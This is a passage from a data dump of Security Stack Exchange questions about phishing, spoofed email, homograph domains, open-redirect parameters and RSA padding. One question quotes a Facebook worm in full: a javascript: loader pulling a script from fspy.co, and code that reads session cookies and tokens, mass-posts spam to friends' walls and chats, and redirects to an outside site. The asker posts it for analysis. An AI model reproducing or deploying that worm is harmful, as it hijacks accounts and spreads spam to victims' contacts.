 I only got a confirmation after this and was not prompted to do anything else.&lt;/p&gt;
 &lt;p&gt;To add to my confusion, once I later checked to see if &lt;code&gt;father@localDomain&lt;/code&gt; was also set as a recovery email for &lt;code&gt;mother@gmail.com&lt;/code&gt;, I could find no connection between these two accounts. &lt;/p&gt;
 &lt;p&gt;If this was a very clever phishing attempt which somehow related my parents' email addresses, I don't know how it could have worked since at no point I was prompted to input any password or other personal data. 
 I also tried hard to identify any telltale signs of phishing. 
 Did I miss something?&lt;/p&gt;
 &lt;p&gt;If not, what happened?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;account-security&gt;&lt;gmail&gt;&lt;recovery&gt;</t>
  </si>
  <si>
    <t>How to convince team mate about using an allowlist for a link created from a parameter?</t>
  </si>
  <si>
    <t>&lt;h2&gt;Context&lt;/h2&gt;
 &lt;p&gt;In our development team, we have to build a component. This component is a full client side one written in Javascript.&lt;/p&gt;
 &lt;p&gt;A client web application wishing to embed this component will call it like below:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;iframe id=&amp;quot;fullScreenIframe&amp;quot; src=&amp;quot;http://my-server.com/component?param1=val1&amp;amp;param2=...&amp;quot;&amp;gt;&amp;lt;/iframe&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;h2&gt;The problem&lt;/h2&gt;
 &lt;p&gt;One of the parameters accepted by the component makes some of us nervous. The &lt;code&gt;origin&lt;/code&gt; parameter is used to generate a link to take the user back to the client web application.&lt;/p&gt;
 &lt;p&gt;Here is how the component manages this parameter:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$(document).ready(function() {
  var origin = urlParameters[&amp;quot;origin&amp;quot;];// Dynamically built from the current document url
  if(origin != undefined){
  // The link to take the user back...
  $(&amp;quot;#welcomePage&amp;quot;).attr(&amp;quot;href&amp;quot;,origin);
  // Another link in the breadcrumb using the same `origin` parameter
  $(&amp;quot;#simulationPage&amp;quot;).attr(&amp;quot;href&amp;quot;, &amp;quot;index.html&amp;quot;+&amp;quot;?origin=&amp;quot;+origin);
  }
  // ...
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;h2&gt;What we already told him&lt;/h2&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;Website phishing&lt;/strong&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Even if the &lt;code&gt;origin&lt;/code&gt; parameter is passed to jQuery, any website can be used in a phishing scam. A user can be asked to (re)enter their credentials thinking they are on a real site. The hole here will be the component.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;strong&gt;Allowlist with valid values&lt;/strong&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;The valid values of &lt;code&gt;origin&lt;/code&gt; can be stored remotely in an allowlist. The component would check the allowlist first before generating the link. A default link can be generating if an unexpected value is found.&lt;/p&gt;
 &lt;p&gt;Those two arguments didn't convince him. He wants to be demonstrated that the &lt;code&gt;origin&lt;/code&gt; parameter can be a security hole. What would you tell him?&lt;/p&gt;
 &lt;p&gt;By the way, I'm looking for a good PoC demonstrating the weakness of the &lt;code&gt;origin&lt;/code&gt; parameter.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;xss&gt;&lt;javascript&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Facebook spam / phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got this sent by a friend on Facebook and I don't think its a genuine message:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;___ shared a link on your Wall. 
 This will leave you speechless) 
 http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668 
 Osama Bin Laden Death Video! 
 Navy Seals raid Bin Ladens hideout and execute him! 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There it gave a message to type the following in the address bar:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;javascript:(a=(b=document).createElement('script')).src='//fspy.co/o.js?'+Math.random(),b.body.appendChild(a);void(0)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I checked this fspy.co/o.js file and its contents are as below.&lt;/p&gt;
 &lt;p&gt;I was trying to understand what this script does. Does anybody here have more insights?
  ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
  // KuNG FU JS v.1 20yrsplus.info
  ///////////////////////////////////////////////////////////////////////////////////////////////////////////////&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
 function readCookie(name) {
  var nameEQ = name + "=";
  var ca = document.cookie.split(';');
  for(var i=0;i &amp;lt; ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  }
  return null;
 }
 var user_id = readCookie("c_user");
 // Setup some variables
 var post_form_id = document.getElementsByName('post_form_id')[0].value;
 var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
 // Multiple URL Shorteners
 var shortArray = new Array(
  "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?",
  "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?"
  );
 var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];
 // Chat message variables
 var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
 var prepared_chat = encodeURIComponent(this_chat);
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 // Post Link to friends walls
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 var token = Math.round(new Date().getTime() / 1000);
 var http1 = new XMLHttpRequest();
 var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&amp;amp;viewer="+user_id+"&amp;amp;token="+token+"-6&amp;amp;filter[0]=user&amp;amp;options[0]=friends_only";
 var params1 = "";
 http1.open("GET", url1+"?"+params1, true);
 http1.onreadystatechange = function() {//Call a function when the state changes.
  if(http1.readyState == 4 &amp;amp;&amp;amp; http1.status == 200) { // If state = success
  var response1 = http1.responseText;
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  //alert(response4.toSource());
  var count = 0;
  for(uid in response1.payload.entries){
  if(count &amp;lt; 400){
  //alert("SENT TO "+response1.payload.entries[count].uid);
  // Loop to send messages
  // New XMLHttp object
  var httpwp = new XMLHttpRequest();
  var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
  var randLink = new Array("http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?", "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?");
  var statusmessage="This will leave you speechless";
  var title="Osama Bin Laden Death Video!";
 // var link="http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
  var link = randLink[Math.floor(randLink.length*Math.random())];
  var description="Navy Seals raid Bin Ladens hideout and execute him! ";
  var picture="http://cooldadssz.co.cc/laden.png";
  var paramswp = "post_form_id="+post_form_id+"&amp;amp;fb_dtsg="+fb_dtsg+"&amp;amp;xhpc_composerid=u574553_1&amp;amp;xhpc_targetid="+response1.payload.entries[count].uid+"&amp;amp;xhpc_context=profile&amp;amp;xhpc_fbx=1&amp;amp;aktion=post&amp;amp;app_id=2309869772&amp;amp;UIThumbPager_Input=0&amp;amp;attachment[params][metaTagMap][0][http-equiv]=content-type&amp;amp;attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&amp;amp;attachment[params][metaTagMap][1][property]=og%3Atitle&amp;amp;attachment[params][metaTagMap][1][content]="+title+"&amp;amp;attachment[params][metaTagMap][2][property]=og%3Aurl&amp;amp;attachment[params][metaTagMap][2][content]="+link+"&amp;amp;attachment[params][metaTagMap][3][property]=og%3Asite_name&amp;amp;attachment[params][metaTagMap][3][content]="+title+"&amp;amp;attachment[params][metaTagMap][4][property]=og%3Aimage&amp;amp;attachment[params][metaTagMap][4][content]="+picture+"&amp;amp;attachment[params][metaTagMap][5][property]=og%3Adescription&amp;amp;attachment[params][metaTagMap][5][content]="+description+"&amp;amp;attachment[params][metaTagMap][6][name]=description&amp;amp;attachment[params][metaTagMap][6][content]="+description+"&amp;amp;attachment[params][metaTagMap][7][http-equiv]=Content-Type&amp;amp;attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&amp;amp;attachment[params][medium]=106&amp;amp;attachment[params][urlInfo][user]="+link+"&amp;amp;attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&amp;amp;attachment[params][title]="+title+"&amp;amp;attachment[params][fragment_title]=&amp;amp;attachment[params][external_author]=&amp;amp;attachment[params][summary]="+description+"&amp;amp;attachment[params][url]="+link+"&amp;amp;attachment[params][ttl]=0&amp;amp;attachment[params][error]=1&amp;amp;attachment[params][responseCode]=206&amp;amp;attachment[params][metaTags][description]="+description+"&amp;amp;attachment[params][images][0]="+picture+"&amp;amp;attachment[params][scrape_time]=1302991496&amp;amp;attachment[params][cache_hit]=1&amp;amp;attachment[type]=100&amp;amp;xhpc_message_text="+statusmessage+")&amp;amp;xhpc_message="+statusmessage+")&amp;amp;nctr[_mod]=pagelet_wall&amp;amp;lsd&amp;amp;post_form_id_source=AsyncRequest";
  httpwp.open("POST", urlwp, true);
  //Send the proper header information along with the request
  httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  httpwp.setRequestHeader("Content-length", paramswp.length);
  httpwp.setRequestHeader("Connection", "keep-alive"); 
  httpwp.onreadystatechange = function() { //Call a function when the state changes.
  if(httpwp.readyState == 4 &amp;amp;&amp;amp; httpwp.status == 200){
  //alert(http.responseText);
  //alert('buddy list fetched');
  }
  }
  httpwp.send(paramswp);
  }
  count++; // increment counter
  }
  http1.close; // Close the connection
  }
 }
 http1.send(null);
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 // Hide chat boxes
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 var hide = document.getElementById('fbDockChatTabSlider');
 hide.style.display = "none";
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 // Get online friends and send chat message to them
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 var http3 = new XMLHttpRequest();
 var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
 var params3 = "user="+user_id+"&amp;amp;popped_out=false&amp;amp;force_render=true&amp;amp;post_form_id="+post_form_id+"&amp;amp;fb_dtsg="+fb_dtsg+"&amp;amp;lsd&amp;amp;post_form_id_source=AsyncRequest";
 http3.open("POST", url3, true);
 //Send the proper header information along with the request
 http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 http3.setRequestHeader("Content-length", params3.length);
 http3.setRequestHeader("Connection", "close");
 http3.onreadystatechange = function() {//Call a function when the state changes.
  if(http3.readyState == 4 &amp;amp;&amp;amp; http3.status == 200) {
  var response3 = http3.responseText;
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  var count = 0;
  for(property in response3.payload.buddy_list.nowAvailableList){
  if(count &amp;lt; 100){
  // Loop to send messages
  // New XMLHttp object
  var httpc = new XMLHttpRequest();
  // Generate random message ID
  var msgid = Math.floor(Math.random()*1000000);
  var time = Math.round(new Date().getTime() / 1000);
  var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
  var paramsc = "msg_id="+msgid+"&amp;amp;client_time="+time+"&amp;amp;to="+property+"&amp;amp;num_tabs=1&amp;amp;pvs_time="+time+"&amp;amp;msg_text="+prepared_chat+"&amp;amp;to_offline=false&amp;amp;post_form_id="+post_form_id+"&amp;amp;fb_dtsg="+fb_dtsg+"&amp;amp;lsd&amp;amp;post_form_id_source=AsyncRequest";
  httpc.open("POST", urlc, true);
  //Send the proper header information along with the request
  httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  httpc.setRequestHeader("Content-length", paramsc.length);
  httpc.setRequestHeader("Connection", "close");
  httpc.onreadystatechange = function() { //Call a function when the state changes.
  if(httpc.readyState == 4 &amp;amp;&amp;amp; httpc.status == 200){
  //alert(http.responseText);
  //alert('buddy list fetched');
  }
  }
  httpc.send(paramsc);
  }
  //alert(property);
  count++; // increment counter
  }
  http3.close; // Close the connection
  }
 }
 http3.send(params3);
 /*
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 // Become a Fan - MW GIVEAWAY
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 var http4 = new XMLHttpRequest();
 var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
 var params4 = "fbpage_id=193321447379497&amp;amp;add=1&amp;amp;reload=0&amp;amp;preserve_tab=false&amp;amp;nctr[_mod]=pagelet_header&amp;amp;post_form_id="+post_form_id+"&amp;amp;fb_dtsg="+fb_dtsg+"&amp;amp;lsd&amp;amp;post_form_id_source=AsyncRequest"
 http4.open("POST", url4, true);
 //Send the proper header information along with the request
 http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 http4.setRequestHeader("Content-length", params4.length);
 http4.setRequestHeader("Connection", "close");
 http4.onreadystatechange = function() {//Call a function when the state changes.
  if(http4.readyState == 4 &amp;amp;&amp;amp; http4.status == 200) {
  http4.close; // Close the connection
  }
 }
 http4.send(params4);
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 // Become a Fan - MW GIft
 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
 var http5 = new XMLHttpRequest();
 var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
 var params5 = "fbpage_id=182116595173798&amp;amp;add=1&amp;amp;reload=0&amp;amp;preserve_tab=false&amp;amp;nctr[_mod]=pagelet_header&amp;amp;post_form_id="+post_form_id+"&amp;amp;fb_dtsg="+fb_dtsg+"&amp;amp;lsd&amp;amp;post_form_id_source=AsyncRequest"
 http5.open("POST", url5, true);
 //Send the proper header information along with the request
 http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 http5.setRequestHeader("Content-length", params5.length);
 http5.setRequestHeader("Connection", "close");
 http5.onreadystatechange = function() {//Call a function when the state changes.
  if(http5.readyState == 4 &amp;amp;&amp;amp; http5.status == 200) {
  http5.close; // Close the connection
  }
 }
 http5.send(params5);
 */
 //document.getElementById('susta').style.display="none";
 document.getElementById('contentArea').innerHTML="&amp;lt;center&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /&amp;gt;&amp;lt;br /&amp;gt;Please wait...&amp;lt;/center&amp;gt;";
 var endArray = new Array("http://fspy.co/", "http://fspy.co/", "http://fspy.co/", "http://fspy.co/");
 var ending = endArray[Math.floor(endArray.length*Math.random())];
 setTimeout("window.location = 'http://fbview.net/osama.html';", 15000);
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;javascript&gt;</t>
  </si>
  <si>
    <t>Can I avoid phishing attacks by putting in the wrong password first before logging in?</t>
  </si>
  <si>
    <t>&lt;p&gt;Here's my logic. The only reason someone would phish you is to get your credentials. That means they don't know your credentials. Thus, if you try to login to their fake website, they can't be sure whether your password is correct or not, so they just let you in.
 So, if you put in a fake password, but you're still able to log in, that means that the website you visited is definitely a fake.
 Now, you leave.
 Phish avoided.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Should I visit a website of a popular company if the browser warns of a potential security risk?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have faced this situation several times. Some websites are presented as a potential security risk. Should I continue to browse such a webpage?&lt;/p&gt;
 &lt;p&gt;I am attaching one example, just an example. Actually I need a general answer.&lt;/p&gt;
 &lt;p&gt;I was trying to find out the specs of some equipment made by Gilardoni, an Italian company. I followed the link from Google, but the browser somehow thinks the website is a potential security risk. I investigated further and found that the webpage is presenting a security certificate that has expired just yesterday. The company is famous in this field, but how do I know that I am not being a victim of an MITM attack or there isn't something phishy going on?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/j5Xsm.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/j5Xsm.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/931mc.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/931mc.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;certificates&gt;&lt;account-security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>user272187</t>
  </si>
  <si>
    <t>Phishing and emails from icloud.com</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently, various companies have been sending me emails from addresses like
 support_at_example_com_r1a8nd4o6m7@icloud.com.&lt;/p&gt;
 &lt;p&gt;I used to be able to determine if an email was not a phishing email by looking at the domain, but that method is not available when the domain is icloud.com.&lt;/p&gt;
 &lt;p&gt;Is there any way to know which company sent me the email from icloud.com?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;2022/1/2&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;This seems to be a conversion by Apple's Hyde My Email feature.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Spam that comes from names in my address book, but not their email addresses</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently received two spam messages that show a possibly worrying degree of knowledge about my contacts, and I'm wondering how concerned I should be.&lt;/p&gt;
 &lt;p&gt;Specifically, the names -- but not the email addresses -- that they appear to come from are family members. They share the same last name as me, but it doesn't appear to be random name guessing -- the only two messages I've received with a sender sharing my last name are real first names of family members (no "misses"). &lt;strong&gt;&lt;em&gt;Edit:&lt;/em&gt;&lt;/strong&gt; one of the names is fairly common; the other is pretty rare (didn't rank higher than #428 on &lt;a href="http://www.ssa.gov/oact/babynames/"&gt;http://www.ssa.gov/oact/babynames/&lt;/a&gt;), and can be easily discovered by visiting the website linked in my profile.&lt;/p&gt;
 &lt;p&gt;The messages were addressed to an older email account that I no longer use, but that's still set up to forward to my current address. This older email address does show up in various google searches alongside my name, but neither of these other two names as far as I can tell.&lt;/p&gt;
 &lt;p&gt;Given the above, how concerned should I be that &lt;strong&gt;&lt;em&gt;my&lt;/em&gt;&lt;/strong&gt; account has been breached -- as opposed to an account belonging to some third party who knows both me and these two family members, and still has my old address in their contact list?&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Edit 2&lt;/em&gt;&lt;/strong&gt;: I've had 2-factor authentication enabled on my main email (gmail) for some time before this spam began arriving, with no known loss of control of my phone, backup codes, etc. I will also enable it for Facebook now that that's become available.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;identity&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to best educate users on telltale signs of malware infections?</t>
  </si>
  <si>
    <t>&lt;p&gt;My company is in the process of training and testing all employees on our security policies and practices. As a member of the team doing this training and testing, I had a thought that it may be beneficial to invent a set of drills. These drills would test against different critical security controls as well as the execution of the response plans. I know a number of companies do tests like these for phishing, which we will also do.&lt;/p&gt;
 &lt;p&gt;One thing that I'd like to test is a suspected malware infection. My thought process for this is to have someone with remote administrator access to a given employees machine could trigger an event which emulated a malware infection. More importantly, it would be an infection which bypassed our anti-virus.&lt;/p&gt;
 &lt;p&gt;Obviously, there are a number of behaviors which a malware may exhibit, with the "ideal" (for the malware) being to exhibit no behaviors. That said, is there a set of malware characteristic behaviors that could be replicated in a safe and reversible manner by an administrator or tool we have installed on their system? A list of my current thoughts:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Browser hijack - Redirect the user's browser to a malicious intranet page&lt;/li&gt;
 &lt;li&gt;Edit the hosts file - Redirect common IPs/DNS entries to a malicious intranet page&lt;/li&gt;
 &lt;li&gt;High CPU Use - Emulate a botnet or bitcoin-mining malware by creating a spurious process which performs harmless but excessive calculations&lt;/li&gt;
 &lt;li&gt;High Disk Use - Emulate a current ransomware attack by creating a spurious process which performs harmless but excessive disk reads/writes&lt;/li&gt;
 &lt;li&gt;Ransomware popup - Create a popup image taken from one of the popular ransomwares and simply show the ransom page&lt;/li&gt;
 &lt;li&gt;Unauthorized access - Have an administrator remote in and leave open a page signed in to something like an AdSense account, signed in to the "attacker's" account (I've seen this happen before)&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Are there any that I'm missing? Any that should be removed?&lt;/p&gt;
 &lt;p&gt;Whatever battery of tests we create may not be exhaustive, but the goal is to simply test that employees are being attentive to these kinds of breaches and report them when detected. Hopefully this will have the side benefit of having them be more sensitive to these kind of attacks at home as well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;professional-education&gt;&lt;incident-response&gt;</t>
  </si>
  <si>
    <t>Spoof email is using my domain name email address but target almost only my contact list with credible content body</t>
  </si>
  <si>
    <t>&lt;p&gt;Since yesterday, one of my work email addresses is used to send spoof emails with phishing attachments. SPF and DKIM was configured on my domain name but not DMARC, but since yesterday in the evening, everything is configured and I received a report this morning, so this point is ok.
 &lt;strong&gt;But this is not the main problem.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The scam email was sent almost only to the contact list and history used with this address (some suppliers), and the body was signed with the name of my coworker using this address and appeared really believable (like asking to confirm availability of some products listed in the attachment).
 So the hackers have had access at some point to the content of our mailbox, they are not only using our address to send some viagra related links, but in this case, why aren't they just using our credentials to send the mails ?&lt;/p&gt;
 &lt;p&gt;I am as confused as worried and I don't know where to look. I already have changed all passwords of all our domain email addresses ; the email address used by the hackers was logged in a few devices, all of them run on ubuntu except one on windows: this is obviously the main suspect (no offense haha), so I disconnected it from the network and ran an analysis but everything seems ok...&lt;/p&gt;
 &lt;p&gt;Everything appears to be ok from my point of view but knowing that someone somehow managed to watch our mailbox content really worry me, so I now rely on you and your ideas about this situation.&lt;/p&gt;
 &lt;p&gt;Thank you everyone for your attention, I may have forgot to tell you some details so don't hesitate to ask me.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Are browsers still vulnerable to IDN homograph attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is it not possible for Chrome and Firefox to protect against this &gt; &lt;a href="https://www.%D0%B0%D1%80%D1%80%D3%8F%D0%B5.com/" rel="nofollow noreferrer"&gt;https://www.–∞—Ä—Ä”è–µ.com/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Navigating to that above (fake) apple website using Firefox 59.0.2 doesn't actually take me to the apple website, but it still says apple[dot]com in my web browser...&lt;/p&gt;
 &lt;p&gt;References:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;a href="https://www.xudongz.com/blog/2017/idn-phishing/" rel="nofollow noreferrer"&gt;https://www.xudongz.com/blog/2017/idn-phishing/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html" rel="nofollow noreferrer"&gt;https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="https://en.wikipedia.org/wiki/IDN_homograph_attack" rel="nofollow noreferrer"&gt;https://en.wikipedia.org/wiki/IDN_homograph_attack&lt;/a&gt;&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;appsec&gt;&lt;dns&gt;&lt;chrome&gt;&lt;firefox&gt;</t>
  </si>
  <si>
    <t>Security Flaw in all "logging by" system - phishing opportunity</t>
  </si>
  <si>
    <t>&lt;p&gt;We all face such popups. &lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.stack.imgur.com/IcbuW.png" alt="Phishing opportunity"&gt;&lt;/p&gt;
 &lt;p&gt;How can you assure that it's NOT phishing, if It's not in the browser. &lt;/p&gt;
 &lt;p&gt;UIWebView (View that displays this logging view) is controlled by application we really don't even know if this is secured connection!&lt;/p&gt;
 &lt;p&gt;Is it true that developer could easily turned those logging windows into phishing or I'm missing something ? &lt;/p&gt;
 &lt;p&gt;The same thing with mobile applications that display (supposedly) UIWebView instead redirect to browser.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;logging&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>SQLMap using "?ref="</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm learning about net security and how to deal with SQLmap. A friend made some demo web pages on his server to test SQLmap. One of the pages is a fake phishing site with a refer to a real site (index.asp?ref=REALSITE). &lt;/p&gt;
 &lt;p&gt;If I scan the fake phishing site with the referrer parameter, would I inadvertently scan the site which is referred too?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;vulnerability-scanners&gt;&lt;sqlmap&gt;</t>
  </si>
  <si>
    <t>Would Gmail server be able to protect me from phishing attacks if I'm using a stock email app on Android?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a Gmail account and I am using Samsung email app. Recently I have switched to the Gmail app because I thought using the Gmail app would be safer because that app would automatically filter phishing attacks. I wonder if Google handles security threats on the server side and automatically puts unsafe emails into a different folder such as the spam folder. Is it a safe practice to use the Samsung email app against phishing, does Gmail handle Security on the server side? Do I have to use the Gmail app so that Gmail filters malicious emails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;android&gt;&lt;phishing&gt;&lt;gmail&gt;</t>
  </si>
  <si>
    <t>Phishing domain converting text due to special character?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Warning:&lt;/strong&gt; The following links are phishing links, please do not sign in to them.&lt;/p&gt;
 &lt;p&gt;Today, a friend of mine came across the link &lt;code&gt;hxxp://ste·∫°mcommunlty(dot)com/tradeoffer/new/&lt;/code&gt;. It's a phishing link, but I have no idea how it works. Notice the a in steam is a special character? When you go to that link and copy and paste it, it somehow converts to &lt;code&gt;xn--stemcommunlty-kf2g(dot)com&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;How is it doing that? Is it something to do with the &lt;code&gt;·∫°&lt;/code&gt; converting into something else making it a completely different URL?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Does PKCS 1.5 padding make it possible for an attacker to extract the private key or not? Is PKCS 1.5 safe to use in authentication context?</t>
  </si>
  <si>
    <t>&lt;p&gt;Im currently writing a authentication app based on RSA, for Android that should be impossible to copy, even if you have physical access to a phone without lockscreen/PIN.&lt;/p&gt;
 &lt;p&gt;However, the HSM inside the phone, that ensures the private key can never leave the storage, only be "used", does only support PKCS 1.5 padding due to a bug in the bouncycastle implementation.&lt;/p&gt;
 &lt;p&gt;The encrypted messages, will be different every time (nonce) so theres no possibility to observe that two encrypted messages are identical over the wire.&lt;/p&gt;
 &lt;p&gt;A attacker or adversiary, while not having access to the phone, does not have access to a padding oracle.
 The app works by having the user scan a encrypted QR and this encrypted QR decrypts into a OTP code. Yes, the attacker can display, on a phishing page or hijacked connection, a QR code containing padding errors, and observe if the user proceeds with authentication (enters a valid OTP) or not, but what I read on some pages, a padding oracle attack requires millions of "tests" against the padding.&lt;/p&gt;
 &lt;p&gt;When the attacker or adversiary do have access to the phone, the attacker can use the phone itself as padding oracle, but also, when having access to the phone, the attacker is able to decrypt arbitary messages using the app anyways.&lt;/p&gt;
 &lt;p&gt;The security goals that must be met, is that:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;While the attacker does not have access to the phone, the attacker should not be able to authenticate.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If the attacker does have access to the phone, even for a long time, he should be able to authenticate, but not extract the private key.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;When attacker does no longer have access to the phone, for example if the attacker is a previous employee that have been fired and then have turned in the phone, the attacker should no longer be able to authenticate, even if he previously did have access to the phone, and even if the keypair inside the secure hardware, has not been changed.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;On this page, the answer mentions its possible to extract the private key, by mounting a padding oracle attack:
 &lt;a href="https://security.stackexchange.com/questions/32050/what-specific-padding-weakness-does-oaep-address-in-rsa"&gt;What specific padding weakness does OAEP address in RSA?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;However, the wikipedia page, mentions no reveal of private keys: &lt;a href="https://en.wikipedia.org/wiki/Padding_oracle_attack" rel="nofollow noreferrer"&gt;https://en.wikipedia.org/wiki/Padding_oracle_attack&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;But the wikipedia page mentions, using the padding oracle, a attacker is able to decrypt arbitary messages, by just checking the padding oracle replies, without having access to the either the key nor the plaintext output of the decryption engine.
 However, in this case, when a attacker does have access to the padding oracle, the attacker also have access to the plaintext output and vice versa, which means that decryption of arbitary messages is already possible when the attacker does have access to the decryption engine, without having to resort to a padding oracle attack.&lt;/p&gt;
 &lt;p&gt;The 2 things are completely different, because with the private key, the attacker is able to do decryption while he no longer have access to the padding oracle, but if the padding oracle can only be used to decrypt messages, the padding oracle effectively becomes useless to the attacker in this case, because when the attacker no longer have padding oracle access, he can no longer do decryption, and the security goal is met.&lt;/p&gt;
 &lt;p&gt;The questions I have is:&lt;/p&gt;
 &lt;p&gt;1: Is it safe to use PKCS 1.5 in this case?&lt;/p&gt;
